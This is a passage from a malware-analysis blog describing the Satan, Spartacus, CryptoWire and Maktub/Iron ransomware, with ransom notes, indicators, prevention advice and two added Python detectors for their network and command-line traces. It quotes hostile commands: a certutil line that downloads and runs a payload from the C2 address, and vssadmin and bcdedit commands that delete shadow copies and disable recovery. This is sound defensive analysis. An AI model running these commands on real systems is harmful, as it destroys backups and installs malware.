<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-4DTTJTrLQxw/WtvVlVB4pxI/AAAAAAAACCQ/yE_hY1VQxikyFrtqS12DdbepMAIO-x98gCLcBGAs/s1600/note.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="913" data-original-width="1031" height="353" src="https://1.bp.blogspot.com/-4DTTJTrLQxw/WtvVlVB4pxI/AAAAAAAACCQ/yE_hY1VQxikyFrtqS12DdbepMAIO-x98gCLcBGAs/s400/note.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - Ransom note</td></tr>
</tbody></table>
<div>
<br />
<div>
<br /></div>
<div>
The note is, as usual, in English, Chinese and Korean, and demands that the user pay 0.3 BTC. Satan will prepend filenames with its email address, <b>satan_pro@mail.ru</b>, and append the <b>.satan</b> extension. For example:<b> [satan_pro@mail.ru]Desert.jpg.satan</b></div>
<div>
<b><br /></b></div>
<div>
<div>
BTC Wallet: <b>14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo </b></div>
<div>
Email: <b>satan_pro@mail.ru</b></div>
</div>
<div>
Note: <b>_How_to_decrypt_files.txt</b></div>
<div>
<br />
It appears one person has already paid 0.2 BTC:<br />
<a href="https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo">https://blockchain.info/address/14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo</a><br />
<br /></div>
<div>
Satan will create a unique mutex, <b>SATANAPP</b>, so the ransomware won't run twice. It will also generate a unique hardware ID and send it to the C2 server:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1<br />Connection: Keep-Alive<br />User-Agent: Winnet Client<br />Host: 198.55.107.149</i></blockquote>
</div>
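<div>
The network behaviour described so far gives a defender three cheap detections: the unusual "RookIE/1.0" User-Agent on the SFX downloads, the "Winnet Client" check-in to /data/token.php with a 64-character code, and certutil being used as a downloader by down64.dll. The following is an added example, not the post's own tooling: the indicator values (host, User-Agents, path, command line) come from the post, while the simplified "src method host path "user-agent"" log format, the regular expressions and the sample lines are my own constructions (the paths for ms.exe and client.exe are placeholders, as the post only names /cab/sts.exe).</div>

```python
"""Flag Satan spreader network indicators in proxy logs and process command lines.

Added example; not the post's code. Indicator values come from the post, the
log format, regexes and sample lines are constructed for this demonstration.
"""
import re
from typing import Dict, List

# Indicators from the post
C2_HOST = "198.55.107.149"
SUSPICIOUS_UAS = {"RookIE/1.0", "Winnet Client"}
TOKEN_PATH = re.compile(r"/data/token\.php\?status=ST&code=[0-9A-Fa-f]{64}")
# certutil used as a downloader (LOLBin), as in the command run by down64.dll
CERTUTIL_DL = re.compile(
    r"certutil(?:\.exe)?\s+-urlcache\s+-split\s+-f\s+(?P<url>\S+)", re.I)

# Constructed, simplified proxy log: <src> <method> <host> <path> "<user-agent>"
CODE = "a" * 64   # constructed placeholder for the 64-char hardware ID
SAMPLE_HTTP_LOG = "\n".join([
    '10.0.0.5 GET 198.55.107.149 /cab/ms.exe "RookIE/1.0"',
    '10.0.0.5 GET 198.55.107.149 /cab/client.exe "RookIE/1.0"',
    f'10.0.0.5 GET 198.55.107.149 /data/token.php?status=ST&code={CODE} "Winnet Client"',
    '10.0.0.7 GET www.example.com /index.html "Mozilla/5.0"',
])

HTTP_LINE = re.compile(
    r'^(?P<src>\S+) (?P<method>\S+) (?P<host>\S+) (?P<path>\S+) "(?P<ua>[^"]*)"$')


def scan_http_log(log: str) -> List[Dict[str, str]]:
    """Return one hit per log line that matches any Satan network indicator."""
    hits = []
    for line in log.splitlines():
        m = HTTP_LINE.match(line)
        if not m:
            continue                      # unparseable line: skip, don't crash
        reasons = []
        if m["ua"] in SUSPICIOUS_UAS:
            reasons.append(f"user-agent {m['ua']!r}")
        if m["host"] == C2_HOST:
            reasons.append("known C2 host")
        if TOKEN_PATH.search(m["path"]):
            reasons.append("Satan hardware-ID check-in")
        if reasons:
            hits.append({"src": m["src"], "line": line, "reasons": ", ".join(reasons)})
    return hits


def scan_command_line(cmdline: str) -> Dict[str, str]:
    """Flag certutil -urlcache -split -f <url>, the download trick used to
    plant sts.exe on freshly exploited hosts; returns {} when not present."""
    m = CERTUTIL_DL.search(cmdline)
    if not m:
        return {}
    return {"technique": "certutil download", "url": m["url"]}


if __name__ == "__main__":
    for hit in scan_http_log(SAMPLE_HTTP_LOG):
        print(hit["src"], "->", hit["reasons"])
    # The command observed in the post (run by down64.dll on other machines)
    observed = ("cmd.exe /c certutil.exe -urlcache -split -f "
                "http://198.55.107.149/cab/sts.exe c:/sts.exe&c:\\sts.exe")
    print(scan_command_line(observed))
```

The User-Agent and path matches survive a change of C2 address, which is why they are listed separately from the host match; the certutil rule is generic and will also catch unrelated abuse of the same LOLBin, so treat it as a hunting lead rather than a Satan-specific alert.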
<div>
<br />
As mentioned at the beginning of this blog post, Satan ransomware has been using EternalBlue since at least November 2017. For example, <b>25005f06e9b45fad836641b19b96f4b3 </b>is another downloader which works similarly to the one described in this post. It would fetch the following files:<br />
<br />
<ul>
<li>http://122.114.9.220/data/client.exe</li>
<li>http://122.114.9.220/data/ms.exe</li>
<li>http://122.114.9.220/data/winlog.exe</li>
</ul>
<br />
<div>
According to VirusTotal, the downloader file was uploaded:</div>
<b>2017-11-20 18:35:17 UTC ( 5 months ago )</b><br />
<br />
For additional reading, read <a href="https://s.tencent.com/research/report/455.html" target="_blank">this</a> excellent post by Tencent, who discovered a similar variant using EternalBlue earlier in April this year.<br />
<br />
<br /></div>
<div>
<b><span style="font-size: large;">Disinfection</span></b></div>
<div>
<br /></div>
<div>
You may want to verify if any of the following files or folders exist:</div>
<div>
<br /></div>
<div>
<ul>
<li>C:\sts.exe</li>
<li>C:\Cryptor.exe</li>
<li>C:\ProgramData\ms.exe</li>
<li>C:\ProgramData\client.exe</li>
<li>C:\Windows\Temp\KSession</li>
</ul>
</div>
<div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Prevention</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
<ul>
<li>Enable UAC</li>
<li>Enable Windows Update, and install updates (especially verify if <a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" target="_blank">MS17-010</a> is installed)</li>
<li>Install an antivirus, and keep it up-to-date and running</li>
<li>Restrict, where possible, access to shares (ACLs)</li>
<li>Create backups! (and test them)</li>
</ul>
<div>
More ransomware prevention can be found <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a>.</div>
</div>
<div>
<br /></div>
</div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
Satan is not the first ransomware to use EternalBlue (WannaCry, for example); however, it does appear the developers of Satan are continuously improving and adding features to their ransomware.</div>
<div>
<br /></div>
<div>
Prevention is always better than disinfection/decryption.</div>
<div>
<br />
<br />
<br />
<br />
<b>IOCs</b><br />
<b><br /></b></div>
<script src="https://otx.alienvault.com/pulse/5adbde5d8d69441f29beae74.js"></script><br />
<b><span style="font-size: large;">This is Spartacus: new ransomware on the block</span></b> (Bart, published 2018-04-15, updated 2018-05-07)<br />
In this blog post, we'll analyse Spartacus, one of many new ransomware families popping up in 2018.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
This instance of Spartacus ransomware has the following properties:<br />
<br />
<br />
<ul>
<li><b>MD5</b>: 25dee2e70c931f3fa832a5b189117ce8</li>
<li><b>SHA1</b>: a01294ffd541229718948e17f791694efb596123</li>
<li><b>SHA256</b>: ef25bdbcf05fa478df3ddc5f4f717c070e443da04cfc590d44409c815f237cb3</li>
<li><b>Compilation timestamp</b>: 2018-01-19 20:36:44</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/ef25bdbcf05fa478df3ddc5f4f717c070e443da04cfc590d44409c815f237cb3/analysis/" target="_blank">ef25bdbcf05fa478df3ddc5f4f717c070e443da04cfc590d44409c815f237cb3</a></li>
</ul>
<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-fq58IHqHMuA/WtNxsLvpUZI/AAAAAAAACAk/c8lPQ31U-5IqT6bQrJa9_l96p0tT0qjRQCLcBGAs/s1600/Spartacus.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="916" data-original-width="1493" height="245" src="https://4.bp.blogspot.com/-fq58IHqHMuA/WtNxsLvpUZI/AAAAAAAACAk/c8lPQ31U-5IqT6bQrJa9_l96p0tT0qjRQCLcBGAs/s400/Spartacus.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Spartacus ransomware message</td></tr>
</tbody></table>
<br />
The message reads:<br />
<br />
<blockquote class="tr_bq">
<i>All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us the e-mail:<br />MastersRecovery@protonmail.com and send personal ID KEY:<br />In case of no answer in 24 hours us to theese e-mail: MastersRecovery@cock.li</i></blockquote>
<br />
The user may send up to 5 files for free decryption, as a "guarantee". There's also a warning message at the end of the ransomware screen:<br />
<br />
<blockquote class="tr_bq">
<i>Do not rename encrypted files.<br />Do not try decrypt your data using party software, it may cause permanent data loss.<br />Decryption of your files with the help of thrid parties may cause increased price (they add their fee to our) or you can become a victim of a scam.</i></blockquote>
<br />
Spartacus will encrypt files, regardless of extension, in the following folders:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-pt54aMYXoD4/WtNxsAOmexI/AAAAAAAACA0/Nrod7gbMPGIjAPjxzJPvAMmMkVPunb9OQCEwYBhgL/s1600/Folders.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="292" data-original-width="650" height="178" src="https://3.bp.blogspot.com/-pt54aMYXoD4/WtNxsAOmexI/AAAAAAAACA0/Nrod7gbMPGIjAPjxzJPvAMmMkVPunb9OQCEwYBhgL/s400/Folders.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Target folders to encrypt</td></tr>
</tbody></table>
<br />
Generating the key:<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8dW-SUVw86k/WtNxsLfJhWI/AAAAAAAACA4/11U-S2pgA3MXnlFeVTZ406rNUze90jBwwCEwYBhgL/s1600/RNG.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="344" data-original-width="764" height="180" src="https://4.bp.blogspot.com/-8dW-SUVw86k/WtNxsLfJhWI/AAAAAAAACA4/11U-S2pgA3MXnlFeVTZ406rNUze90jBwwCEwYBhgL/s400/RNG.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - KeyGenerator</td></tr>
</tbody></table>
<br />
As far as I'm aware, Spartacus is the first ransomware that explicitly <i>asks</i> you to send the public key (ID KEY), rather than just asking for an email, including the Bitcoin address straight away, or sending the key automatically.<br />
<br />
Encrypted files will get the extension appended as follows:<br />
<b>.[MastersRecovery@protonmail.com].Spartacus </b><br />
<br />
For example:<br />
Penguins.jpg.[MastersRecovery@protonmail.com].Spartacus<br />
<br />
It will also drop the ransom note, "READ ME.txt", in several locations, such as the user's Desktop:<br />
<br />
<blockquote class="tr_bq">
<i>All your data has been locked us. You want to return? Write email MastersRecovery@protonmail.com or MastersRecovery@cock.li Your personal ID KEY: DvQ9/mvfT3I7U847uKcI0QU3QLd+huv5NOYT2YhfiySde0vhmkzyTtRPlcu73BAJILIPdALjAIy5NLxBHckfyV2XS+GXdjlHMx2V/VEfj4BrZkLB3BQtEdAqS1d2yzb/2+AqTNjsRfZ99ZWVxUZO3AeEZk5h0+3hNM5GogUN2oV5zHkbMZuDaXZxQr56r8UKnW7gmSycdcJh2ueZMuEP1tAuuzdZYgmZ05x9ZT8FX9HIo03rwsi6UiJlgUTZCkiilZjxYyG+qVE+Gjk4H7dnXbQP1PC3k2WICA9R4TYb9SCdv8U/e5sxbuKAbJgEZ114liwHLasmLvQfKYSbxMlbEg==</i></blockquote>
<br />
Interestingly enough, Spartacus also embeds what appears to be a hardcoded and private RSA key:<br />
<br />
<blockquote class="tr_bq">
<i>&lt;RSAKeyValue&gt;&lt;Modulus&gt;xA4fTMirLDPi4rnQUX1GNvHC41PZUR/fDIbHnNBtpY0w2Qc4H2HPaBsKepU33RPXN5EnwGqQ5lhFaNnLGnwYjo7w6OCkU+q0dRev14ndx44k1QACTEz4JmP9VGSia6SwHPbD2TdGJsqSulPkK7YHPGlvLKk4IYF59fUfhSPiWleURYiD50Ll2YxkGxwqEYVSrkrr7DMnNRId502NbxrLWlAVk/XE2KLvi0g9B1q2Uu/PVrUgcxX+4wu9815Ia8dSgYBmftxky427OUoeCC4jFQWjEJlUNE8rvQZO5kllCvPDREvHd42nXIBlULvZ8aiv4b7NabWH1zcd2buYHHyGLQ==&lt;/Modulus&gt;&lt;Exponent&gt;AQAB&lt;/Exponent&gt;&lt;/RSAKeyValue&gt;</i></blockquote>
<br />
Spartacus will delete Shadow Volume Copies by issuing the following command:<br />
<br />
<blockquote class="tr_bq">
<i>cmd.exe /c vssadmin.exe delete shadows /all /quiet</i></blockquote>
<br />
A unique mutex named "<b>Test</b>" is created so that the ransomware does not run twice, and Spartacus will also continuously force the ransom screen to the foreground (on top of other windows) using the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setforegroundwindow" target="_blank">SetForegroundWindow</a> function:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-ooqEvpzYC1s/WtO1QaFc1VI/AAAAAAAACBE/R0Qj4EJaZwE07Fb2siPewcA5iWcZ5hbLQCLcBGAs/s1600/Foreground.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="154" data-original-width="585" height="105" src="https://3.bp.blogspot.com/-ooqEvpzYC1s/WtO1QaFc1VI/AAAAAAAACBE/R0Qj4EJaZwE07Fb2siPewcA5iWcZ5hbLQCLcBGAs/s400/Foreground.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Ransom will stay on top and annoy the user</td></tr>
</tbody></table>
<br />
<br />
<br />
To repeat, the email addresses used are:<br />
<br />
<blockquote class="tr_bq">
<i>MastersRecovery@protonmail.com<br />MastersRecovery@cock.li</i></blockquote>
<br />
Decryption may be possible if the ransomware is left running, by extracting the key from memory.<br />
<br />
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<br />
Spartacus is yet another ransomware family, or variant, popping up.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-8fUUNvR3AU4/WtNxdYzbvRI/AAAAAAAACAw/mKlcfWvk8nUK2IolqoXGNuDrqFUdXyCKwCEwYBhgL/s1600/AAAAAAAAAA.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="262" data-original-width="487" height="172" src="https://4.bp.blogspot.com/-8fUUNvR3AU4/WtNxdYzbvRI/AAAAAAAACAw/mKlcfWvk8nUK2IolqoXGNuDrqFUdXyCKwCEwYBhgL/s320/AAAAAAAAAA.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Meme</td></tr>
</tbody></table>
<br />
Make sure to read the dedicated page on <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">ransomware prevention</a> to prevent Spartacus or any other ransomware.<br />
<br />
<br />
<br />
<b>IOCs</b>
<br />
<script src="https://otx.alienvault.com/pulse/5ad377fb2254cc12b8145b99.js"></script>
<br />
<b><span style="font-size: large;">CryptoWire ransomware not dead</span></b><br />
Posted by Bart on 2018-04-12 (updated 2018-04-13)<br />
<br />
CryptoWire is an "open-source" ransomware written in the AutoIt scripting language, and has been around since 2016. For some background, read the following post on Bleeping Computer:<br />
<a href="https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" target="_blank">"Proof of Concept" CryptoWire Ransomware Spawns Lomix and UltraLocker Families</a><br />
<br />
I already encountered a CryptoWire variant last year, when it was used to target users in Brazil:<br />
<a href="https://bartblaze.blogspot.co.uk/2017/04/ransomware-fala-serio.html" target="_blank">Ransomware, fala sério!</a><br />
<br />
In this blog post, we'll briefly analyse another, recent, CryptoWire sample.<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
This CryptoWire variant has the following properties:<br />
<br />
<ul>
<li>MD5: f6d01e72a58a8bdf14f9a103250f779e</li>
<li>SHA1: 3b97bac22a04282ebbaef60beb168a41e4449239</li>
<li>SHA256: 4deff7d8434583ea8e5c3ef9b4c64674dfb165b1720ddf63b5abdd8ed6a7399c</li>
<li>Compilation timestamp: 2018-04-10 16:00:12</li>
<li>VirusTotal report:<br /><a href="https://www.virustotal.com/en/file/4deff7d8434583ea8e5c3ef9b4c64674dfb165b1720ddf63b5abdd8ed6a7399c/analysis/" target="_blank">4deff7d8434583ea8e5c3ef9b4c64674dfb165b1720ddf63b5abdd8ed6a7399c</a></li>
</ul>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-sTs8nqbQ0U8/Ws_F_u2d9CI/AAAAAAAACAQ/_sGI22UFNf8EMPiTbvldhJEcnltSqeO7QCLcBGAs/s1600/CryptoWire.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1183" data-original-width="1414" height="267" src="https://2.bp.blogspot.com/-sTs8nqbQ0U8/Ws_F_u2d9CI/AAAAAAAACAQ/_sGI22UFNf8EMPiTbvldhJEcnltSqeO7QCLcBGAs/s320/CryptoWire.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Typical CryptoWire layout</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
The message reads:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
<i>The only way you can recover your files is to buy a decryption key<br />The payment method is: Bitcoins. The price is: $1000 = Bitcoins<br />When you are ready, send a message by email to wlojul@secmail.pro<br />We will send you our BTC wallet for the transfer<br />After confirmation we will send you the decryption key<br />Click on the 'Buy decryption key' button.</i></blockquote>
</div>
<div>
<br /></div>
<div>
CryptoWire will encrypt files with the following extensions (282 total):</div>
<div>
<br /></div>
<div>
3fr, 7z, EPS, M3U, M4A, PEM, PSD, WPS, XLSX, abw, accdb, afsnit, ai, aif, arc, arw, as, asc, asd, asf, ashdisc, asm, asp, aspx, asx, aup, avi, bay, bbb, bdb, bibtex, bkf, bmp, bmp, bpn, btd, bz2, c, cdi, cdr, cer, cert, cfm, cgi, cpio, cpp, cr2, crt, crw, csr, cue, dbf, dcr, dds, dem, der, dmg, dng, doc, docm, docx, dsb, dwg, dxf, dxg, eddx, edoc, eml, emlx, eps, epub, erf, fdf, ffu, flv, gam, gcode, gho, gpx, gz, h, hbk, hdd, hds, himmel, hpp, ics, idml, iff, img, indd, ipd, iso, isz, iwa, j2k, jp2, jpeg, jpf, jpg, jpm, jpx, jsp, jspa, jspx, jst, kdc, key, keynote, kml, kmz, lic, lwp, lzma, m4v, max, mbox, md2, mdb, mdbackup, mddata, mdf, mdinfo, mds, mef, mid, mov, mp3, mp4, mpa, mpb, mpeg, mpg, mpj, mpp, mrw, msg, mso, nba, nbf, nbi, nbu, nbz, nco, nef, nes, note, nrg, nri, nrw, odb, odc, odm, odp, ods, odt, ogg, one, orf, ova, ovf, oxps, p12, p2i, p65, p7, p7b, p7c, pages, pct, pdd, pdf, pef, pem, pfx, php, php3, php4, php5, phps, phpx, phpxx, phtm, phtml, pl, plist, pmd, pmx, png, ppdf, pps, ppsm, ppsx, ppt, pptm, pptx, ps, psd, pspimage, pst, ptx, pub, pvm, qcn, qcow, qcow2, qt, r3d, ra, raf, rar, raw, rm, rtf, rtf, rw2, rwl, s, sbf, set, skb, slf, sme, smm, snp, spb, sql, sr2, srf, srt, srw, ssc, ssi, stg, stl, svg, swf, sxw, syncdb, tager, tc, tex, tga, thm, tif, tiff, til, toast, torrent, txt, vbk, vcard, vcd, vcf, vdi, vfs4, vhd, vhdx, vmdk, vob, vsdx, wav, wb2, wbk, wbverify, webm, wmb, wpb, wpd, wps, x3f, xdw, xlk, xlr, xls, xlsb, xlsm, xlsx, xz, yuv, zip, zipx</div>
<div>
<br /></div>
<div>
It will also encrypt files, regardless of extension, in certain folders such as Desktop.</div>
<div>
<br /></div>
<div>
Files are encrypted with AES, and ".encrypted" is inserted before the original extension of each encrypted file. For example: Tulips.<b>encrypted</b>.png.</div>
<div>
<br /></div>
<div>
CryptoWire will delete Shadow Volume Copies and disable Windows startup recovery via BCDEdit by executing these commands:<br />
<blockquote class="tr_bq">
<i>vssadmin.exe Delete Shadows /All /Quiet</i><br />
<i>bcdedit /set {default} recoveryenabled No</i><br />
<i>bcdedit /set {default} bootstatuspolicy ignoreallfailures</i></blockquote>
<br />
It will additionally create a scheduled task for persistence.</div>
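<div>
Both Spartacus (cmd.exe /c vssadmin.exe delete shadows /all /quiet) and CryptoWire (the vssadmin and bcdedit commands above) tamper with recovery through ordinary process creation, which is exactly where a defender can catch them. The following is an added example, not code from either post: a small Python detector run over constructed process-creation events in Sysmon Event ID 1 style (the field names Image, ParentImage and CommandLine, and the sample binaries invoice.exe and cw.exe, are assumptions for the example). It generalises slightly beyond the page by also matching the wmic shadowcopy delete variant of the same technique.</div>

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style, cut
# down to three fields). These are made up for this example, not real logs.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\victim\Downloads\invoice.exe",
     "CommandLine": "cmd.exe /c vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\ProgramData\cw.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"Image": r"C:\Windows\System32\bcdedit.exe",
     "ParentImage": r"C:\ProgramData\cw.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"Image": r"C:\Windows\System32\bcdedit.exe",
     "ParentImage": r"C:\ProgramData\cw.exe",
     "CommandLine": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"Image": r"C:\Windows\System32\vssadmin.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},  # benign admin activity: no alert
]

# Rules keyed on the command line, case-insensitive, because both families
# reach vssadmin through cmd.exe and casing differs between samples.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE)),
    ("shadow_copy_deletion",  # wmic equivalent; generalisation beyond the posts
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.IGNORECASE)),
    ("recovery_disabled",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.IGNORECASE)),
    ("boot_status_policy_ignored",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b",
                re.IGNORECASE)),
]


def detect_recovery_tampering(events):
    """Return (event_index, rule_name, parent_image) for every event whose
    command line matches one of RULES; at most one finding per event."""
    findings = []
    for idx, event in enumerate(events):
        cmd = event.get("CommandLine", "")
        for name, pattern in RULES:
            if pattern.search(cmd):
                findings.append((idx, name, event.get("ParentImage", "")))
                break
    return findings


def group_by_parent(findings):
    """Map each parent process to the set of rules it triggered. A parent that
    both deletes shadow copies and changes bcdedit is the first binary to pull
    for analysis: in this sample that is cw.exe."""
    by_parent = defaultdict(set)
    for _idx, name, parent in findings:
        by_parent[parent].add(name)
    return dict(by_parent)


if __name__ == "__main__":
    hits = detect_recovery_tampering(SAMPLE_EVENTS)
    for idx, name, parent in hits:
        print(f"event {idx}: {name} (parent: {parent})")
    print(group_by_parent(hits))
```

<div>
Matching on the command line rather than on the image name is what lets the first event alert even though the image is cmd.exe; vssadmin list shadows, which administrators run legitimately, is deliberately not matched.</div>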
<div>
<br /></div>
<div>
You can decrypt files for this specific variant with the following Decryption Key:<br />
<b>VgjRPoOM0oa92_jId!/wkMeW6,guuSe</b></div>
<div>
<b><br /></b></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
<b><span style="font-size: large;">Conclusion</span></b></div>
<div>
<b><span style="font-size: large;"><br /></span></b></div>
<div>
Some ransomware variants simply do not die; CryptoWire appears to be one of them. If you have been hit by this particular strain, use the decryption key as instructed above, and your files will be decrypted.</div>
<div>
<br /></div>
<div>
Make sure to read the dedicated page on <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">ransomware prevention</a> to prevent CryptoWire, or any other "open-source" ransomware, from infecting your machine and encrypting your files.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>IOCs</b></div>
<script src="https://otx.alienvault.com/pulse/5acfc910b96990681863b4f5.js"></script>
<b><span style="font-size: large;">Maktub ransomware: possibly rebranded as Iron</span></b><br />
Posted by Bart on 2018-04-10 (updated 2019-11-10)<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
In this post, we'll take a quick look at a possible new ransomware variant, which appears to be the latest version of Maktub ransomware, also known as Maktub Locker.<br />
<br />
<a href="https://twitter.com/hasherezade" target="_blank">hasherezade</a> from Malwarebytes has, as per usual, written an excellent blog post on Maktub Locker in the past, if you wish to learn more: <a href="https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/" target="_blank">Maktub Locker – Beautiful And Dangerous</a><br />
<br />
<b><span style="color: orange;">Update - 2018-04-14</span></b>: Read the conclusion at the end of this post to learn more about how Iron ransomware mimicked at least three different ransomware families.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
A file named <i>ado64</i> was discovered, with the following properties:<br />
<br />
<br />
<ul>
<li><b>MD5</b>: 1e60050db59e3d977d2a928fff3d34a6</li>
<li><b>SHA1</b>: f51bab89b4e4510b973df8affc2d11a4476bd5be</li>
<li><b>SHA256</b>: 19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770</li>
<li><b>Compilation timestamp</b>: 2018-04-05 03:47:19</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770/analysis/1523265965/" target="_blank">19ee6d4a89d7f95145660ca68bd133edf985cc5b5c559e7062be824c0bb9e770</a></li>
</ul>
<div>
<br /></div>
<div>
Maktub typically sports a graphically appealing lock screen, as well as a payment portal, and promotes "Maktub Locker" extensively. </div>
<div>
<br /></div>
<div>
<br /></div>
<div>
Interestingly enough, this variant has removed all references to Maktub. The figures below show the lock screen and the payment portal when stepping through them.</div>
<div>
<br /></div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-WAlX00ifOVY/Ws0B6jrnViI/AAAAAAAAB_I/3KQBa0NrOSARlFIegUUkq742HEH7jBYGACLcBGAs/s1600/r0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="686" data-original-width="674" height="320" src="https://1.bp.blogspot.com/-WAlX00ifOVY/Ws0B6jrnViI/AAAAAAAAB_I/3KQBa0NrOSARlFIegUUkq742HEH7jBYGACLcBGAs/s320/r0.PNG" width="314" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Lock screen/warning<br />
<br /></td></tr>
</tbody></table>
Email address: <i>recoverfile@mail2tor.com</i><br />
<div>
Bitcoin address: <i>1cimKyzS64PRNEiG89iFU3qzckVuEQuUj</i><br />
Ransomware note: <i>!HELP_YOUR_FILES.HTML</i><br />
<div>
<br /></div>
<div>
<br /></div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-JYQbqrFMABc/Ws0CrZaEu3I/AAAAAAAAB_g/5q9bm8aTskkGrBoLmkLi1YUoBOinw1RhQCLcBGAs/s1600/r_id.PNG" imageanchor="1" style="font-size: medium; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="215" data-original-width="779" height="88" src="https://2.bp.blogspot.com/-JYQbqrFMABc/Ws0CrZaEu3I/AAAAAAAAB_g/5q9bm8aTskkGrBoLmkLi1YUoBOinw1RhQCLcBGAs/s320/r_id.PNG" width="320" /></a></td></tr>
